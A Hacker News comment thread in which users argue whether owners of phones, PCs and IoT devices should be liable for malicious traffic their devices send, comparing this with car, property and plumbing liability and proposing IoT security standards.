Hacker News new | past | comments | ask | show | jobs | submit login

You can't expect everyone to be able to identify when their car is not running as expected. Wait, you can and you must under the law. Also there are liabilities.



Very much not the same thing. Your car can't interact with the cars of others without physical contact, and when it does interact, via a crash or otherwise, it would be very obvious to anyone. Even if you were constantly watching the traffic of your phone and other devices, you'll probably miss malicious packets that are sent among the thousands of packets each device sends per minute. It's also not as obvious to recognize what constitutes malicious behavior in your internet device compared to your car.

Also, the operation of the car is simple enough that you can take it to a mechanic for an inspection and they can reliably inspect everything that the car does. There are no hidden behaviors under complex conditions, like crashing into others when there is a full moon or the sky is cloudy. Your devices can do that. If you bring me your phone/laptop/etc and ask me if it's going to send malicious packets to someone somewhen, I can't reliably tell you that it won't. I'm not sure that even if you gathered all software and electronics engineers that supposedly were involved in the construction of your device, they'd be able to provide a reliable answer. I can tell you that it seems like it wouldn't based on initialization files and services, but I can't tell if the function is hidden somehow, like obfuscated in the machine code of the kernel or something. Finding that would require auditing all assembly code running on the machine, which would not be a task for mortals.


I'm liable if my car spontaneously catches fire while parked. Car is just an analogy.


What I'm saying is that it's very simple to inspect a car and make sure it's not going to spontaneously catch fire while parked. You can get a reliable answer in a day from a mechanic.

You can't get a reliable answer on whether a computing device is programmed to send malicious packets. There's too much code, most is compiled, there's too many ways to hide it. You can probably gather the smartest people in the world and leave them to die of old age before they can arrive at a reliable answer.


We are in the area of probability in both cases. Oftentimes is obvious if PC/device is infected. Sometimes is really hard to find out, https://en.wikipedia.org/wiki/Stuxnet


The question is whether you feel good enough about that probability to be held liable if the malicious code was hidden good enough. Also, some cases might be obvious on Windows PCs, but I don't think that's necessarily the case with phones. Take note that websites can also send malicious packets. When you load a webpage, the code is downloaded and immediately executed. Are you OK with being held liable for visiting a webpage that decided to send malicious packets?


Liability boundary is an important question. There is no simple answer. Couple of years back owner of the abandoned building was declared liable of the death of the kid who entered to the fenced building despite all the signs no trespassing and so on. Neither your example nor mine negates that there should liability for various voluntarily and involuntarily acts, own or third party.


> Couple of years back owner of the abandoned building was declared liable of the death of the kid who entered to the fenced building despite all the signs no trespassing and so on.

Honestly, that doesn't sound right. I hope I'm misjudging because of lack of details.


In the the US the term is attractive nuisance. It's not a new thing either, case law in the US dates back to the 1870's.


I feel like you try very hard to establish a strawman. No one expects 100% perfection. Establishing and following industry standards is a good first step.

Like no unencrypted local passwords. Individual default passwords for every individual device. Not using outdated version, especially once vulnerabilities are known. Including an update mechanism and providing updates for at least X years.

And yes, trained specialists will be able to work through such checklists for many commonly used software, just like your car mechanic.

And by the way, no one expects your car mechanic to [a] be perfect (you really never heard a story of a car breaking again just after leaving the shop?) or [b] be able to handle any kind of vehicle unknown to him.

The goal of rules like that is to punish the worst tier, thereby raising the bar. But this will probably be more hard to implement in the US with their everyone-sues-everyone mindset. Reminds me a lot of the great GDPR scare but now imo quite reasonable actual cases happening.


> I feel like you try very hard to establish a strawman.

This is the second time someone's told me that. Looking into what a strawman is again and reviewing my comments, I'm not sure I'm doing that. The examples I see on Wikipedia[1], at least, don't seem to have a strong relationship of implication. That is, the strawmen aren't directly implied from the proposals.

In this case, I do think that making one liable for damages their machine is causing to other people's machines does directly mean what I said, that one would be liable for behavior they cannot control as well as they can control the behavior of their car.

My intentions are to provide not strawmen, but counterexamples where the proposal fails.

> No one expects 100% perfection.

I do. I'm not really OK with laws where I don't have reasonable control of whether I break them or not. In this case, the only effective control I'd have is to not have an internet device, and that seems unreasonable.

I think we'd all like to think otherwise, but the traffic sent by our phones is very much out of our control because of the reasons I stated, and nobody reviews the javascript code received from an HTTP server before executing it. It seems crazy to be liable for whatever it does.

> And by the way, no one expects your car mechanic to [a] be perfect (you really never heard a story of a car breaking again just after leaving the shop?) or [b] be able to handle any kind of vehicle unknown to him.

I think the analogy isn't that strong. Visiting webpages is like changing car parts every second as the car is running. Malicious behavior of these car parts is not noticeable at all and they're not easy to spot from inspection either.

> The goal of rules like that is to punish the worst tier, thereby raising the bar. But this will probably be more hard to implement in the US with their everyone-sues-everyone mindset. Reminds me a lot of the great GDPR scare but now imo quite reasonable actual cases happening.

Well, there was a lot of things that scared people of GDPR, but I think I can assume your point is that a law can be broad and technically applicable to many people unfairly, but only applied to just cases in practice. I'm not sure I like that kind of law, though. Even if it works well in practice for the majority of cases, it seems like the kind of thing that lends itself well to abuse, the kind of law that everybody is guilty for, even if they're not all actively prosecuted.

[1] https://en.wikipedia.org/wiki/Straw_man#Examples


> What I'm saying is that it's very simple to inspect a car and make sure it's not going to spontaneously catch fire while parked.

With electric cars on the rise, it's only a matter of time until the equivalent of the Samsung Galaxy Note 7, but for cars.


Brakes squeal when they are wearing down. If I put a penny in the tread of my tires and see Abe Lincoln’s head I know they are bald. If my head lamps go out I’ll notice; if it’s a brake light I get a red indicator lamp on my dash that says I have a problem.

Let’s talk about liability when home routers make a revving engine sound when they push too many packets per second, or start playing a “buckle up” warning chime every 6 seconds if they see packets heading to a C2 server.


I'm liable if water/sewage breaks in my condo and there won't be any 'squeal'. Analogies work but are not equal. My point is that there should be liability for the malfunctioning internet equipment, definitely so for businesses.


Maybe. Or maybe liability exists for outside parties in that case: the plumber who was drunk when they put the pipes in, the architect who designed the wall in such a way to force a ton of joints in one weak spot, the building inspector who signed off on it... heck, maybe the water company is causing a water hammer to form because their pumps are busted.

Now if my home owners insurance finds that I flooded the downstairs condo because I fell asleep with the bath running, you bet I’ll pay.

But no matter what, either of your examples have a robust regulatory structure around them in terms of licensing and inspections. That is why liability works - without those structures you can’t say “you fucked up, therefore you pay”.

I’m all for adding liability into the system but if we do we must do it in a way that spreads the burden to the right places (IoT manufacturers, negligent ISPs) and doesn’t push it straight to the consumer.


So same should be with IoT? Programmer 'who was drunk when they put the' code should be liable.


>> I’m all for adding liability into the system but if we do we must do it in a way that spreads the burden to the right places (IoT manufacturers, negligent ISPs) and doesn’t push it straight to the consumer.

Now, having said that, when the limb of my tree knocks the power line off my house I have to pay to fix it, but the electric company is on the hook to send someone to turn the line off so my electrician can work on it.

ISPs have to be in the liability chain too: if one of their customers is talking to a C&C server and participating in a DDoS they have to switch off the customer until repairs can be made.




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: